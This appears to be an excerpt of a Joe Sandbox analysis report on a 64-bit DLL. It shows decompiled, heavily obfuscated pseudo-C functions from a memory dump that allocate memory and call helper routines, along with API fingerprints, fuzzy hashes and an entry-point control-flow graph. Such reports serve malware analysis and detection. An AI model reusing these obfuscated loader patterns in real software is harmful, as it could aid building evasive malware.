                          				r14d = r14d | r13d ^ 0x00002032;
                          				if (1 != _t159) goto 0x8c0713f0;
                          				r9d = r9d + 3;
                          				_t113 = r9d - r12d;
                          				if (_t113 >= 0) goto 0x8c0713e0;
                          				r10d = r10d + 4;
                          				_a40 = r10d;
                          				if (_t113 == 0) goto 0x8c071340;
                          				r8d = _a104;
                          				if (r8d - _a88 + 0xffffef7a < 0) goto 0x8c071503;
                          				 *(_t171 + 0x198) =  *(_t171 + 0x198) * 0x1873ac2e;
                          				if ( *((intOrPtr*)(_t171 + 0x158)) == 0) goto 0x8c0714a9;
                          				_t126 =  *(_t171 + 0x1e0) | 0x000038e9;
                          				 *(_t171 + 0x198) = _t126;
                          				GetProcessHeap();
                          				if (_t126 == 0) goto 0x8c0714a9;
                          				_t140 = _t126;
                          				HeapFree(??, ??, ??);
                          				_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t171 + 0x40)) + 0x200)) - 0x24c;
                          				if (_t99 - _t140 > 0) goto 0x8c071503;
                          				asm("o16 nop [eax+eax]");
                          				 *((long long*)(_t171 + 0x228)) =  *((intOrPtr*)(_t171 + 0x228)) - 0x2598;
                          				if (_t99 + 1 - _t140 <= 0) goto 0x8c0714e0;
                          				return r14d + 0x17e6;
                          			}




























                          0x7ff88c0711f0
                          0x7ff88c0711fb
                          0x7ff88c071209
                          0x7ff88c071211
                          0x7ff88c071218
                          0x7ff88c07121c
                          0x7ff88c071220
                          0x7ff88c071224
                          0x7ff88c071232
                          0x7ff88c071236
                          0x7ff88c07123d
                          0x7ff88c071245
                          0x7ff88c07124c
                          0x7ff88c071259
                          0x7ff88c071261
                          0x7ff88c07126c
                          0x7ff88c07127f
                          0x7ff88c071286
                          0x7ff88c071294
                          0x7ff88c07129b
                          0x7ff88c0712a0
                          0x7ff88c0712a7
                          0x7ff88c0712b2
                          0x7ff88c0712c2
                          0x7ff88c0712c9
                          0x7ff88c0712d4
                          0x7ff88c0712d9
                          0x7ff88c0712e0
                          0x7ff88c0712eb
                          0x7ff88c0712ef
                          0x7ff88c0712f3
                          0x7ff88c0712f8
                          0x7ff88c0712ff
                          0x7ff88c071302
                          0x7ff88c071309
                          0x7ff88c07130e
                          0x7ff88c071315
                          0x7ff88c071318
                          0x7ff88c07131a
                          0x7ff88c071320
                          0x7ff88c071328
                          0x7ff88c07132f
                          0x7ff88c071336
                          0x7ff88c071356
                          0x7ff88c071367
                          0x7ff88c071391
                          0x7ff88c0713b4
                          0x7ff88c0713b6
                          0x7ff88c0713be
                          0x7ff88c0713c6
                          0x7ff88c0713cc
                          0x7ff88c0713d5
                          0x7ff88c0713e5
                          0x7ff88c0713f2
                          0x7ff88c0713fb
                          0x7ff88c0713fd
                          0x7ff88c071401
                          0x7ff88c071404
                          0x7ff88c071406
                          0x7ff88c07140a
                          0x7ff88c071412
                          0x7ff88c071418
                          0x7ff88c071458
                          0x7ff88c071469
                          0x7ff88c07147a
                          0x7ff88c071483
                          0x7ff88c071489
                          0x7ff88c071490
                          0x7ff88c071499
                          0x7ff88c0714a0
                          0x7ff88c0714a3
                          0x7ff88c0714c5
                          0x7ff88c0714d1
                          0x7ff88c0714da
                          0x7ff88c0714e9
                          0x7ff88c071501
                          0x7ff88c071511

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: Heap$Process$FileFreePrivilegeReadRelease
                          • String ID:
                          • API String ID: 194138994-0
                          • Opcode ID: fc6a53031119d0dc1bc682c1a9e483c0e406237abdbb8214a97e5422a85c222a
                          • Instruction ID: 88dd406648e4afb3b53a54c50725cf12280b232dd7a6d26d74a8dc89f4bd6970
                          • Opcode Fuzzy Hash: fc6a53031119d0dc1bc682c1a9e483c0e406237abdbb8214a97e5422a85c222a
                          • Instruction Fuzzy Hash: 5671A973609AD18ADB64CF05E048BEE77A8FB89BC4F525025CB5E57B84EB38E545CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: File$CreateDirectoryErrorLastQuery
                          • String ID:
                          • API String ID: 2967190759-0
                          • Opcode ID: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                          • Instruction ID: cde6a7f9e6abaf9be7ddf8f1d975d10d8c289fcc646e28ba02c6090b47244760
                          • Opcode Fuzzy Hash: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                          • Instruction Fuzzy Hash: 1741C133B08B84C6EFE08F62E44835AA2A4F7CE790F1955659E5D43BCACF38D4158760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 60%
                          			E00007FF87FF88C076D50(intOrPtr __ecx, void* __rax, void* __rcx, signed int* __rdx, long long __rsi, void* __r8) {
                          				void* __rbx;
                          				void* __r13;
                          				signed int _t112;
                          				signed int _t117;
                          				signed int _t153;
                          				signed int _t161;
                          				signed int _t169;
                          				signed int _t176;
                          				signed int _t183;
                          				long long _t184;
                          				void* _t186;
                          				void* _t190;
                          				void* _t194;
                          				void* _t196;
                          				void* _t197;
                          				void* _t201;
                          				signed int* _t202;
                          				void* _t203;
                          				void* _t206;
                          				long _t208;
                          				void* _t211;
                          
                          				_t199 = __r8;
                          				_t186 = __rcx;
                          				 *((long long*)(_t196 + 0x10)) = __rdx;
                          				 *((intOrPtr*)(_t196 + 8)) = __ecx;
                          				_push(_t184);
                          				_push(_t194);
                          				_push(_t190);
                          				_push(_t206);
                          				_t197 = _t196 - 0x90;
                          				_t176 =  *(_t197 + 0x130);
                          				r11d = r9d;
                          				r10d = __rax - 0x16de;
                          				 *((intOrPtr*)(_t197 + 0xe8)) = __rcx + 0x114f;
                          				r13d = __rax - 0x37e1;
                          				 *(_t197 + 0x130) = r10d;
                          				r15d = _t190 - 0x23f6;
                          				 *(_t197 + 0x80) = _t194 + 0x17b;
                          				r8d = _t211 + 0x3a59;
                          				r12d = __rcx - 0x165d;
                          				 *(_t197 + 0x100) = r12d;
                          				r9d = __rcx - 0x1351;
                          				if ( *(_t197 + 0x100) + 0xffffec15 - r8d >= 0) goto 0x8c076e2c;
                          				_t183 = __rdx[0x34];
                          				r8d = 0x3000;
                          				_t21 = _t186 + 0x40; // 0x40
                          				r9d = _t21;
                          				_t153 =  *((intOrPtr*)(_t183 + 0x50)) + 0x00000fff & 0xfffff000;
                          				__rdx[0x64] = _t153;
                          				VirtualAlloc(_t211, _t208); // executed
                          				__rdx[0x30] = _t183;
                          				goto 0x8c07710b;
                          				r10d =  *__rdx;
                          				r8d = __rdx[0x50];
                          				r10d = r10d | _t153;
                          				r8d = r8d + __rdx[0x6c];
                          				r8d = r8d ^ 0x00002598;
                          				r10d = r10d +  *__rdx;
                          				 *(_t197 + 0x50) = __rdx[0x36] + __rdx[0x40] ^ 0x00003a59;
                          				 *((long long*)(_t197 + 0xe0)) = __rsi;
                          				r11d = r9d;
                          				r11d = r11d - __rdx[0x18];
                          				r11d = r11d + 0x38e9;
                          				r9d = r15d;
                          				 *(_t197 + 0x48) = __rdx[0x66] * r9d & r9d;
                          				r9d = r9d & _t176;
                          				 *(_t197 + 0x40) = r8d;
                          				 *(_t197 + 0x38) = r10d;
                          				r8d =  *(_t197 + 0xf0) + 0x00000d93 | __rdx[0x12];
                          				 *(_t197 + 0x30) = r11d;
                          				 *(_t197 + 0x28) = (__rdx[0x88] & r10d) - 0x38e9;
                          				 *(_t197 + 0x20) = __rdx[0x70] ^ _t153;
                          				_t112 = E00007FF87FF88C072A70(_t184, __rcx, __rdx, __r8, _t203);
                          				r9d = _t211 - 0x3666;
                          				r9d = r9d ^ 0x000037e1;
                          				r10d = __rdx[0x54];
                          				r10d = r10d + 0x343a;
                          				r11d = __rdx[0x48];
                          				r11d = r11d ^ 0x00001f2c;
                          				 *(_t197 + 0xf0) = _t112;
                          				r13d = r13d - r12d;
                          				r8d = _t194 - 0x37e1;
                          				 *(_t197 + 0x48) = __rdx[0x68] & __rdx[0x50] & 0x0000228c;
                          				 *(_t197 + 0x40) = __rdx;
                          				 *(_t197 + 0x38) = r10d;
                          				 *(_t197 + 0x30) = r11d;
                          				 *(_t197 + 0x28) = (__rdx[0x62] | __rdx[0x8a]) ^ _t176;
                          				 *(_t197 + 0x20) =  *__rdx ^ r13d ^ 0x00002598;
                          				r12d = E00007FF87FF88C0898F0(r13d, _t183, __rdx, _t199, _t201, _t206);
                          				r15d = __rdx[0x32];
                          				_t117 = __rdx[0x62];
                          				r15d = r15d ^ __rdx[0x48];
                          				r13d = __rdx[0x6c];
                          				_t169 = __rdx[0x4c];
                          				_t202 =  *((intOrPtr*)(_t197 + 0xd8));
                          				r14d = __rdx[0x54];
                          				r14d = r14d | _t117;
                          				r8d =  *_t202;
                          				r8d = r8d + _t202[0x38];
                          				r11d = _t202[0x1e];
                          				r10d = _t202[0x8a];
                          				_t161 =  *(_t197 + 0xf0);
                          				r10d = r10d - 0x3666;
                          				r8d = r8d | _t161;
                          				r13d = r13d | 0x000027b2;
                          				r13d = r13d - _t202[0x24];
                          				_t189 =  *((intOrPtr*)(_t197 + 0xd8));
                          				r11d = r11d |  *(_t197 + 0x80);
                          				r11d = r11d +  *((intOrPtr*)(_t197 + 0xe8));
                          				 *(_t197 + 0x78) = r15d;
                          				 *(_t197 + 0x70) = r14d;
                          				 *(_t197 + 0x68) = _t186 + __rdx & _t202[0x16];
                          				 *((intOrPtr*)(_t197 + 0x60)) = _t202[0x44] + 0x38e9 + r13d;
                          				 *(_t197 + 0xf0) = _t117 ^  *(_t197 + 0x80);
                          				 *(_t197 + 0xd0) = ( *(_t197 + 0xd0) - _t161 + 0xea2) * _t169;
                          				r9d =  *(_t197 + 0x110);
                          				r12d =  *(_t197 + 0x100);
                          				r9d = r9d + 0xffffe749;
                          				r9d = r9d ^ _t169;
                          				r12d = r12d | 0x000038e9;
                          				r9d = r9d |  *( *((intOrPtr*)(_t197 + 0xd8)) + 0x100);
                          				 *(_t197 + 0x58) =  *(_t197 + 0xd0);
                          				 *(_t197 + 0x50) =  *(_t197 + 0x130) + _t202[0x72] ^ 0x0000343a;
                          				 *(_t197 + 0x48) = r11d;
                          				 *(_t197 + 0x40) = r10d;
                          				r10d =  *(_t197 + 0xf0);
                          				 *(_t197 + 0x38) = r10d;
                          				 *(_t197 + 0x30) = r13d;
                          				 *(_t197 + 0x28) = r8d;
                          				 *(_t197 + 0x20) = _t202[0x74] ^  *(_t197 + 0x130);
                          				E00007FF87FF88C08A750(_t183, _t186,  *((intOrPtr*)(_t197 + 0xd8)), _t189, _t202);
                          				return  *((intOrPtr*)(_t197 + 0xe8)) + 0xffffeba5;
                          			}
























                          0x7ff88c076d50
                          0x7ff88c076d50
                          0x7ff88c076d50
                          0x7ff88c076d55
                          0x7ff88c076d59
                          0x7ff88c076d5a
                          0x7ff88c076d5b
                          0x7ff88c076d5e
                          0x7ff88c076d64
                          0x7ff88c076d78
                          0x7ff88c076d89
                          0x7ff88c076d93
                          0x7ff88c076d9a
                          0x7ff88c076da1
                          0x7ff88c076da8
                          0x7ff88c076dbb
                          0x7ff88c076dc2
                          0x7ff88c076dc9
                          0x7ff88c076dd0
                          0x7ff88c076dd7
                          0x7ff88c076ddf
                          0x7ff88c076de9
                          0x7ff88c076deb
                          0x7ff88c076df4
                          0x7ff88c076dfd
                          0x7ff88c076dfd
                          0x7ff88c076e07
                          0x7ff88c076e0d
                          0x7ff88c076e14
                          0x7ff88c076e1a
                          0x7ff88c076e27
                          0x7ff88c076e43
                          0x7ff88c076e4c
                          0x7ff88c076e53
                          0x7ff88c076e56
                          0x7ff88c076e64
                          0x7ff88c076e6b
                          0x7ff88c076e77
                          0x7ff88c076e7b
                          0x7ff88c076e98
                          0x7ff88c076e9b
                          0x7ff88c076ea9
                          0x7ff88c076eb3
                          0x7ff88c076eb6
                          0x7ff88c076eba
                          0x7ff88c076ebd
                          0x7ff88c076ec5
                          0x7ff88c076eca
                          0x7ff88c076ecd
                          0x7ff88c076ed2
                          0x7ff88c076ed6
                          0x7ff88c076eda
                          0x7ff88c076ee6
                          0x7ff88c076ef4
                          0x7ff88c076efb
                          0x7ff88c076f07
                          0x7ff88c076f0e
                          0x7ff88c076f1f
                          0x7ff88c076f33
                          0x7ff88c076f3a
                          0x7ff88c076f5c
                          0x7ff88c076f63
                          0x7ff88c076f6a
                          0x7ff88c076f6f
                          0x7ff88c076f74
                          0x7ff88c076f79
                          0x7ff88c076f7d
                          0x7ff88c076f8d
                          0x7ff88c076f97
                          0x7ff88c076f9e
                          0x7ff88c076fa5
                          0x7ff88c076fa8
                          0x7ff88c076faf
                          0x7ff88c076fb9
                          0x7ff88c076fc1
                          0x7ff88c076fc4
                          0x7ff88c076fcb
                          0x7ff88c076fce
                          0x7ff88c076fdc
                          0x7ff88c076fe6
                          0x7ff88c076ff0
                          0x7ff88c076ff7
                          0x7ff88c077005
                          0x7ff88c07700f
                          0x7ff88c077016
                          0x7ff88c07701f
                          0x7ff88c07702d
                          0x7ff88c077035
                          0x7ff88c077044
                          0x7ff88c077049
                          0x7ff88c07704e
                          0x7ff88c077052
                          0x7ff88c077059
                          0x7ff88c07706e
                          0x7ff88c07708b
                          0x7ff88c077096
                          0x7ff88c07709e
                          0x7ff88c0770a5
                          0x7ff88c0770a8
                          0x7ff88c0770af
                          0x7ff88c0770bd
                          0x7ff88c0770c1
                          0x7ff88c0770c5
                          0x7ff88c0770ca
                          0x7ff88c0770cf
                          0x7ff88c0770d7
                          0x7ff88c0770dc
                          0x7ff88c0770e1
                          0x7ff88c0770eb
                          0x7ff88c0770f2
                          0x7ff88c07711d

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 701046bcfc664d896e7e8cbef1e18b682c6a552b8b4cc95593f1301737a4187d
                          • Instruction ID: 07da8353950446368a8f1827b676250d952d3cd75b32a9e2919a2c6c256911b1
                          • Opcode Fuzzy Hash: 701046bcfc664d896e7e8cbef1e18b682c6a552b8b4cc95593f1301737a4187d
                          • Instruction Fuzzy Hash: 07914BB36186D08BD326CF19E448B9EBBA4F788788F514129DF8957B58C739EA51CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 59%
                          			E00007FF87FF88C075840(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, long long _a8, signed int _a24, intOrPtr _a32, long long _a40, intOrPtr _a48, signed int _a64, signed int _a80) {
                          				signed int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				signed int _v72;
                          				intOrPtr _v88;
                          				intOrPtr _v96;
                          				signed int _v104;
                          				signed int _v112;
                          				signed int _v120;
                          				signed int _v128;
                          				signed int _v136;
                          				signed int _v144;
                          				signed int _v152;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* __r12;
                          				signed int _t132;
                          				intOrPtr _t139;
                          				signed int _t144;
                          				signed int _t148;
                          				signed int _t157;
                          				signed int _t174;
                          				intOrPtr _t176;
                          				signed int _t182;
                          				signed int _t183;
                          				void* _t194;
                          				void* _t197;
                          				long long _t216;
                          				long long _t241;
                          				void* _t242;
                          				void* _t243;
                          				void* _t247;
                          				void* _t251;
                          				void* _t253;
                          				void* _t254;
                          				void* _t255;
                          				void* _t256;
                          				void* _t257;
                          				void* _t258;
                          
                          				_t251 = __r9;
                          				_t247 = __r8;
                          				_a8 = __rbx;
                          				r8d = r8d + 0xffffea1c;
                          				r12d = _a80;
                          				r12d = r12d + 0x3c4;
                          				_a48 = __r9 - 0x22c;
                          				_t182 = __rax - 0x27ae;
                          				_v64 = r8d;
                          				r9d = __rax - 0x6ab;
                          				_a24 = _t182;
                          				_a64 = r9d;
                          				r13d = __rcx + 0x18b7;
                          				r14d = __rcx - 0x2032;
                          				r15d = __rcx - 0x106;
                          				if (r13d - __rdx - 0x365 <= 0) goto 0x8c07597a;
                          				_t177 = __r9 + 0xfd2;
                          				_v88 = _t242 + 0x3666;
                          				r10d = _t242 + 0x2598;
                          				r11d = _t257 + 0x3595;
                          				_t183 = _t182 + 0x37e1;
                          				r14d = r14d + 0x23f6;
                          				_v96 = _t256 - 0x760;
                          				_t154 = __r8 + 0x495;
                          				r8d = _a64;
                          				r9d = _t258 + 0x1b2d;
                          				_v104 = r10d;
                          				_v112 = r11d;
                          				_v120 = __r9 + 0x17e6;
                          				_v128 = __r9 + 0xfd2;
                          				_t241 = _a40;
                          				_v136 = _t183;
                          				_v144 = __r9 + 0x1492;
                          				_v152 = r14d;
                          				E00007FF87FF88C076D50(__r8 + 0x495, __rax, __rcx, _t241, _t242, __r8); // executed
                          				r8d =  *(_t241 + 0x190);
                          				E00007FF87FF88C07C440(_t154, 0, _t177, _t194,  *((intOrPtr*)(_t241 + 0xc0)), _t241, _t241, _t247);
                          				goto 0x8c075ca3;
                          				_t216 = _a40;
                          				if ( *((intOrPtr*)(_t216 + 0x140)) -  *((intOrPtr*)(_t216 + 0x228)) - 0x37e1 >= 0) goto 0x8c0759d0;
                          				_t197 = _t183 - r12d - r13d;
                          				if (_t197 > 0) goto 0x8c0759d0;
                          				r8d = r12d;
                          				r8d = r8d & 0x00002032;
                          				asm("o16 nop [eax+eax]");
                          				if (_t197 != 0) goto 0x8c0759c0;
                          				 *(_t216 + 0x1b0) =  *(_t216 + 0x1b0) - _t247;
                          				if ( *(_t216 + 0x1b0) -  *(_t216 + 0x1f0) * r12d > 0) goto 0x8c075c9c;
                          				_a32 = _t183;
                          				if (_t183 - r14d -  *((intOrPtr*)(_t216 + 0x120)) <= 0) goto 0x8c075c71;
                          				_t132 = _t251 + 0x2598;
                          				_a80 = _t132;
                          				if ( *_t216 - ( *(_t216 + 0x1c0) | _t132) <= 0) goto 0x8c075c4a;
                          				r11d = _t258 + _t257;
                          				r10d = r14d;
                          				r10d = r10d * r14d;
                          				_v72 = r15d & 0x00002032;
                          				_v68 = r12d & r13d;
                          				_v60 = r10d;
                          				r11d =  *(_t216 + 0x48);
                          				r9d =  *(_t216 + 0x188);
                          				r11d = r11d ^ r14d;
                          				r8d =  *(_t216 + 0x40);
                          				r11d = r11d + r14d;
                          				r10d = r10d - _a48;
                          				r9d = r9d *  *(_t216 + 0x1b0);
                          				_v104 =  *(_t216 + 0x90) | 0x00002598;
                          				r8d = r8d + r12d;
                          				_v112 =  *((intOrPtr*)(_t216 + 0x130)) + 0x2032;
                          				_v120 = r11d;
                          				_v128 = 0;
                          				_v136 =  *(_t216 + 0x1c0) ^ r11d;
                          				_v144 = r10d;
                          				_v152 =  *(_t216 + 0xa8) & 0x00000d20 | 0x0000120c;
                          				_t139 = E00007FF87FF88C072A70(_t216,  *(_t216 + 0x1c0) | _t132, _t216, _t132, _t253);
                          				_t157 = _a24;
                          				r9d =  *(_t216 + 0x10);
                          				r10d =  *(_t216 + 0x188);
                          				r9d = r9d | 0x00002103;
                          				r8d =  *(_t216 + 0x60);
                          				r9d = r9d + _t157;
                          				_a48 = _t139;
                          				r10d = r10d | 0x000027ae;
                          				r8d = r8d & _t157;
                          				_v120 = _a64 ^ 0x000027b2;
                          				_v128 = _v72;
                          				_v136 = _v68;
                          				_v144 = r10d;
                          				_v152 = r9d;
                          				_t144 = E00007FF87FF88C076820(_t216,  *(_t216 + 0x1c0) | _t132, _t216, _t243, _t216, _t253, _t254, _t255);
                          				r8d =  *(_t216 + 0x90);
                          				r8d = r8d ^ r15d;
                          				r9d =  *(_t216 + 0x1b8);
                          				r8d = r8d | r15d;
                          				r11d =  *(_t216 + 0x1a0);
                          				r11d = r11d + 0x27ae;
                          				r11d = r11d ^ 0x0000343a;
                          				_v112 =  *(_t216 + 0x188) * _v64;
                          				_a24 = _t144;
                          				r9d = r9d * r14d;
                          				_v120 = ( *(_t216 + 0x60) | r13d) ^  *(_t216 + 0x40);
                          				_v128 = r8d;
                          				_v136 = (r15d | r12d) ^ 0x000027ae;
                          				r9d = r9d ^ _a64;
                          				_v144 = r11d;
                          				_v152 =  *(_t216 + 0x40) * 0x00002598 ^  *(_t216 + 0x1f8);
                          				_t148 = E00007FF87FF88C08F6B0(_t216,  *(_t216 + 0x1c0) | _t132, _t216, _t242, _t243, _t216, _t216, _t253);
                          				r11d = _t258 + _t257;
                          				_t174 = _a80 + 3;
                          				r10d = _v60;
                          				_a64 = _t148;
                          				_a80 = _t174;
                          				if (_t174 - ( *(_t216 + 0x1c0) | _t148 + 0x00002598) > 0) goto 0x8c075a70;
                          				_t176 = _a32 + 4;
                          				_a32 = _t176;
                          				if (_t176 - r14d -  *((intOrPtr*)(_t216 + 0x120)) > 0) goto 0x8c075a20;
                          				if (_a24 -  *(_t216 + 0x10) - 0x329d <= 0) goto 0x8c075c9c;
                          				 *(_t216 + 0x48) =  *(_t216 + 0x48) + ( *(_t216 + 0x150) | 0x0000343a) + r13d;
                          				return _t256 + 0x13da;
                          			}











































                          0x7ff88c075840
                          0x7ff88c075840
                          0x7ff88c075840
                          0x7ff88c07586c
                          0x7ff88c075873
                          0x7ff88c07587b
                          0x7ff88c075882
                          0x7ff88c075889
                          0x7ff88c07588f
                          0x7ff88c075894
                          0x7ff88c07589b
                          0x7ff88c0758a8
                          0x7ff88c0758b0
                          0x7ff88c0758b7
                          0x7ff88c0758be
                          0x7ff88c0758c8
                          0x7ff88c0758ce
                          0x7ff88c0758db
                          0x7ff88c0758df
                          0x7ff88c0758e6
                          0x7ff88c0758ed
                          0x7ff88c0758fa
                          0x7ff88c07590f
                          0x7ff88c075913
                          0x7ff88c07591a
                          0x7ff88c075922
                          0x7ff88c075929
                          0x7ff88c07592e
                          0x7ff88c075933
                          0x7ff88c075937
                          0x7ff88c07593b
                          0x7ff88c075943
                          0x7ff88c07594a
                          0x7ff88c07594e
                          0x7ff88c075953
                          0x7ff88c075958
                          0x7ff88c07596a
                          0x7ff88c075975
                          0x7ff88c07597a
                          0x7ff88c075996
                          0x7ff88c07599e
                          0x7ff88c0759a0
                          0x7ff88c0759ab
                          0x7ff88c0759ae
                          0x7ff88c0759ba
                          0x7ff88c0759c7
                          0x7ff88c0759c9
                          0x7ff88c0759e5
                          0x7ff88c0759fa
                          0x7ff88c075a04
                          0x7ff88c075a0a
                          0x7ff88c075a2d
                          0x7ff88c075a37
                          0x7ff88c075a40
                          0x7ff88c075a49
                          0x7ff88c075a4c
                          0x7ff88c075a53
                          0x7ff88c075a60
                          0x7ff88c075a6a
                          0x7ff88c075a8f
                          0x7ff88c075a99
                          0x7ff88c075aa0
                          0x7ff88c075aae
                          0x7ff88c075ab2
                          0x7ff88c075ab5
                          0x7ff88c075ac3
                          0x7ff88c075ad1
                          0x7ff88c075ad5
                          0x7ff88c075ad8
                          0x7ff88c075adf
                          0x7ff88c075ae4
                          0x7ff88c075aec
                          0x7ff88c075af0
                          0x7ff88c075af5
                          0x7ff88c075af9
                          0x7ff88c075afe
                          0x7ff88c075b05
                          0x7ff88c075b09
                          0x7ff88c075b10
                          0x7ff88c075b17
                          0x7ff88c075b1b
                          0x7ff88c075b1e
                          0x7ff88c075b2f
                          0x7ff88c075b3b
                          0x7ff88c075b3e
                          0x7ff88c075b4c
                          0x7ff88c075b54
                          0x7ff88c075b58
                          0x7ff88c075b5d
                          0x7ff88c075b65
                          0x7ff88c075b72
                          0x7ff88c075b7e
                          0x7ff88c075b81
                          0x7ff88c075b88
                          0x7ff88c075b92
                          0x7ff88c075b9f
                          0x7ff88c075bad
                          0x7ff88c075bc6
                          0x7ff88c075bca
                          0x7ff88c075bd7
                          0x7ff88c075bde
                          0x7ff88c075be2
                          0x7ff88c075bea
                          0x7ff88c075bee
                          0x7ff88c075bf6
                          0x7ff88c075bfb
                          0x7ff88c075bff
                          0x7ff88c075c0b
                          0x7ff88c075c16
                          0x7ff88c075c19
                          0x7ff88c075c1e
                          0x7ff88c075c33
                          0x7ff88c075c3d
                          0x7ff88c075c4a
                          0x7ff88c075c5a
                          0x7ff88c075c64
                          0x7ff88c075c82
                          0x7ff88c075c98
                          0x7ff88c075cbd

                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 89a4817951f1a13eee29f1b2b0a9b082e15d1f6d6768b930f3d990648e2eeefa
                          • Instruction ID: 13c12d9e2f03bc1bce8276602c71f2a380d69f0031f8cce0d3b4534b06c9e57a
                          • Opcode Fuzzy Hash: 89a4817951f1a13eee29f1b2b0a9b082e15d1f6d6768b930f3d990648e2eeefa
                          • Instruction Fuzzy Hash: 43B17A736182C18BD725CF24E044BEABBA4F789B88F154136EB8957B58DB39E944CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 7ff88c07b3a0-7ff88c07b3a6 1 7ff88c07b3a8-7ff88c07b3ab 0->1 2 7ff88c07b3e1-7ff88c07b538 0->2 3 7ff88c07b3ad-7ff88c07b3b0 1->3 4 7ff88c07b3d5-7ff88c07b414 call 7ff88c07b89c 1->4 8 7ff88c07b53e-7ff88c07b559 call 7ff88c07b72c 2->8 9 7ff88c07b53a-7ff88c07b53c 2->9 6 7ff88c07b3c8 __scrt_dllmain_crt_thread_attach 3->6 7 7ff88c07b3b2-7ff88c07b3b5 3->7 22 7ff88c07b41d-7ff88c07b432 call 7ff88c07b72c 4->22 23 7ff88c07b416-7ff88c07b418 4->23 14 7ff88c07b3cd-7ff88c07b3d4 6->14 12 7ff88c07b3b7-7ff88c07b3c0 7->12 13 7ff88c07b3c1-7ff88c07b3c6 call 7ff88c07b7dc 7->13 20 7ff88c07b55b-7ff88c07b560 call 7ff88c07bc0c 8->20 21 7ff88c07b565-7ff88c07b58c call 7ff88c07b858 call 7ff88c07b888 call 7ff88c07ba50 call 7ff88c07ba74 8->21 15 7ff88c07b58e-7ff88c07b59d 9->15 13->14 20->21 21->15 32 7ff88c07b43e-7ff88c07b44f call 7ff88c07b79c 22->32 33 7ff88c07b434-7ff88c07b439 call 7ff88c07bc0c 22->33 27 7ff88c07b505-7ff88c07b51a 23->27 40 7ff88c07b4b8-7ff88c07b4c2 call 7ff88c07ba50 32->40 41 7ff88c07b451-7ff88c07b48d call 7ff88c07bd54 call 7ff88c07baf0 call 7ff88c07bbb4 call 7ff88c07baf0 call 7ff88c07bbe0 call 7ff88c07d0c8 32->41 33->32 40->23 49 7ff88c07b4c8-7ff88c07b4d4 call 7ff88c07bbfc 40->49 41->40 68 7ff88c07b48f-7ff88c07b496 __scrt_dllmain_after_initialize_c 41->68 55 7ff88c07b4fa-7ff88c07b500 49->55 56 7ff88c07b4d6-7ff88c07b4e0 call 7ff88c07b9b4 49->56 55->27 56->55 62 7ff88c07b4e2-7ff88c07b4f5 call 7ff88c07bdec 56->62 62->55 